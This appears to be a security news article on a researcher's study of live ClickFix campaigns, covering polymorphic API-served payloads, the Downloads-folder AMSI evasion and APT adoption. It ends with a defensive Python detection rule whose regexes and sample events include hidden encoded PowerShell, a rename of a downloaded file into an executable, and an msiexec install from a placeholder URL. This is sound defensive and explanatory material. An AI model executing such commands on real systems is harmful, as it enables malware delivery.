Bert-Jan Pals analyzed approximately 3,000 payloads from active ClickFix campaigns, presenting the findings on June 30, 2026. The research reveals a maturity leap: from artisanal commands copied to the clipboard to an on-demand, API-based delivery system with polymorphic generators and the commercialization of ready-made builders. The figure that stops you cold is the scale of this shift: 100 consecutive requests to the server produced 100 distinct payloads.
- Bert-Jan Pals analyzed roughly 3,000 ClickFix payloads from live campaigns; 100 requests to the API server generated 100 unique payloads with rotating cryptographic wrapping
- The infrastructure serves lures in 25 languages and adapts the payload to the visitor's operating system, including macOS
- New "Downloads-folder" technique: a benign clipboard command orchestrates a previously downloaded file, evading AMSI
- Nation-state APT groups — APT28, MuddyWater, Kimsuky, and North Korean actors — have adopted ClickFix in their infection chains
From Copy-Paste to On-Demand Generation: The API Architecture
The ClickFix mechanism is well known: a deceptive page tricks the user into pressing a key combination, copying a command to the clipboard, and pasting it into PowerShell or the Run dialog. What Pals mapped is what happens behind that surface.
The payloads originate from backend servers structured as an API service. The researcher documented access tokens, operational logging, and on-demand generation: every request yields a fresh payload, with the same core script wrapped in different cryptographic layers. A test of 100 consecutive requests returned 100 unique variants, rotating through Base64, AES, TripleDES, Rijndael, and Deflate. "The move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat," Pals observed.
The platform segments traffic by language and operating system. Twenty-five languages are documented, with automatic command adaptation for the target: Windows, and in some cases macOS. Three distinct payload servers were identified in the research, though full details on names and endpoints are not available in the published excerpt.
"ClickFix is here to stay"
— Bert-Jan Pals
Downloads-Folder: The Specific Evolution Against AMSI
Windows' primary defense against malicious in-memory scripts is AMSI, the Antimalware Scan Interface. Traditional ClickFix payloads run into AMSI when the copied command is pasted and interpreted. The new technique documented by Pals, dubbed "Downloads-folder," restructures the flow to bypass this check.
The command copied to the clipboard is benign by design: it moves or renames a file already sitting in the Downloads folder. The real payload was downloaded laterally beforehand, separated from the command that triggers it. AMSI scans what passes through the script execution pipeline; a file-move instruction does not trigger the same path. "The disguise is disposable; the malware under it is not," the researcher summarized.
Another adaptation noted is the shift from the Run dialog to Windows Terminal as an execution vehicle. This change reduces forensic traces: the command no longer appears in RunMRU, the registry of recent Run dialog instructions, making post-incident reconstruction harder.
The Numbers Measuring the Surge
ClickFix adoption has reached industrial scale. ESET measured a significant increase in this technique from late 2024 through the first half of 2025. Microsoft flagged ClickFix in 47% of initial access cases detected by the Defender Experts team. Expel detected a wave dubbed ClearFix that likely infected tens of thousands of endpoints starting in August 2025.
The most frequent launchers in the analyzed payloads are PowerShell and cmd.exe, both at roughly 39%, followed by msiexec.exe at roughly 34%. The distribution across multiple execution vectors indicates operators do not rely on a single system binary but test and adapt based on the victim context.
From Mass Crimeware to Nation-State APT Operations
APT adoption of ClickFix documents the transition from a generic criminal technique to a strategic component. APT28 (Russia), MuddyWater (Iran), and Kimsuky (North Korea) have integrated it into their infection chains. ESET tracked the sale of ready-made ClickFix builders to other actors, indicating active commercialization of the infrastructure.
A specific campaign, "ClickFake Interview," attributed to North Korean operators, used this technique against cryptocurrency sector workers. The dossier does not specify whether the APTs use the same API infrastructure identified by Pals or independent variants, but the convergence on the method is the significant data point.
What to Do Now
Defenses against ClickFix require a specific realignment on three fronts. First: endpoint controls must extend beyond script memory scanning, because the Downloads-folder technique separates the benign command — which passes through AMSI — from the malicious payload already resident on disk. Second: security teams must monitor the use of Windows Terminal as an execution vehicle, not just the traditional Run dialog, given the operator shift documented.
Third: visibility into the 3,000 payloads Pals analyzed shows 39% of attacks use PowerShell and 39% use cmd.exe, with 34% routing through msiexec.exe. This distribution demands multi-platform detection rules, not a focus on a single launcher. The on-demand generation of 100 unique payloads from 100 requests also renders static signatures ineffective: detection must shift to anomalous execution-chain behaviors, not hashes or cryptographic patterns.
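The three fronts above translate into one process-chain rule rather than a hash list. The following is an added example (not the researcher's code or any vendor's): it runs over constructed process-creation events with Sysmon-like fields (parent image, image, command line), keys on a launcher spawned from the Run dialog or Windows Terminal plus a payload indicator (encoded or remote-fetching command, or a move/rename of a file already in Downloads), and shows that the flagged events all carry different command-line hashes even where the chain is identical.

```python
import hashlib
import re
from collections import namedtuple

# Launchers the analysis found most often: PowerShell, cmd.exe and msiexec.exe.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe"}
# Interactive parents: Run dialog (explorer.exe) or Windows Terminal, which leaves no RunMRU entry.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Encoded PowerShell, in-memory download cradles, or msiexec installing a remote package.
ENCODED_OR_REMOTE = re.compile(
    r"(-e(c|nc|ncodedcommand)?\b|frombase64string|invoke-webrequest|\biwr\b|"
    r"downloadstring|msiexec.*(/i|/package)\s+https?://)", re.I)
# "Downloads-folder" pattern: a benign-looking move/rename of a file already in Downloads.
DOWNLOADS_FILE_OP = re.compile(r"\b(move-item|move|ren|rename|rename-item|copy)\b.*\\downloads\\", re.I)

ProcEvent = namedtuple("ProcEvent", "parent_image image command_line")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Reasons the event looks like a ClickFix chain (empty = not flagged): a known launcher
    from an interactive parent AND at least one payload indicator on the command line."""
    if basename(ev.image) not in LAUNCHERS or basename(ev.parent_image) not in INTERACTIVE_PARENTS:
        return []
    reasons = []
    if ENCODED_OR_REMOTE.search(ev.command_line):
        reasons.append("encoded or remote-fetching command from interactive parent")
    if DOWNLOADS_FILE_OP.search(ev.command_line):
        reasons.append("file operation on Downloads folder from interactive parent")
    return reasons

def triage(events: list[ProcEvent]) -> tuple[list[ProcEvent], int]:
    """Flagged events and how many distinct command-line hashes they carry: per-request
    wrapping makes every hash unique, while the behaviour rule fires on all of them."""
    flagged = [e for e in events if classify(e)]
    return flagged, len({hashlib.sha256(e.command_line.encode()).hexdigest() for e in flagged})

# Constructed sample events (not from the article); the base64 blobs are placeholders.
EXPL, WT = r"C:\Windows\explorer.exe", r"C:\Program Files\WindowsApps\WindowsTerminal.exe"
PS, CMD, MSI = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe")
SAMPLE_EVENTS = [
    ProcEvent(EXPL, PS, "powershell -w hidden -enc QUFBQUFB"),
    ProcEvent(EXPL, PS, "powershell -w hidden -enc QkJCQkJC"),  # same chain, different wrapping
    ProcEvent(WT, CMD, r'cmd /c ren "%USERPROFILE%\Downloads\report.pdf" svc.exe'),
    ProcEvent(EXPL, MSI, "msiexec /i https://example.invalid/pkg.msi /qn"),
    ProcEvent(WT, CMD, "cmd /c dir"),  # ordinary interactive use, not flagged
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS, "powershell -enc QUFBQUFB"),  # non-interactive parent
]
```

The rule deliberately requires the interactive parent so that service-spawned encoded PowerShell (a separate detection) does not inflate it; the svchost event is left unflagged for that reason.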
The commercialization of builders and APT adoption confirm ClickFix has crossed the threshold separating ephemeral tactics from persistent infrastructure. The open question is how quickly defenses can rebuild visibility over a flow that now fractures between a benign clipboard and a lateral file.
Sources
- https://thehackernews.com/2026/07/researcher-analyzes-3000-live-clickfix.html
- https://isc.sans.edu/diary/rss/33102
- https://www.recordedfuture.com/blog/may-2026-cve-landscape
- https://support.recordedfuture.com/
- https://isc.sans.edu/diary/An+Example+of+Stack+String+in+High+Level+Language/33008
- https://attack.mitre.org/techniques/T1036/
- https://www.sygnia.co/blog/operation-highland-velvet-ant/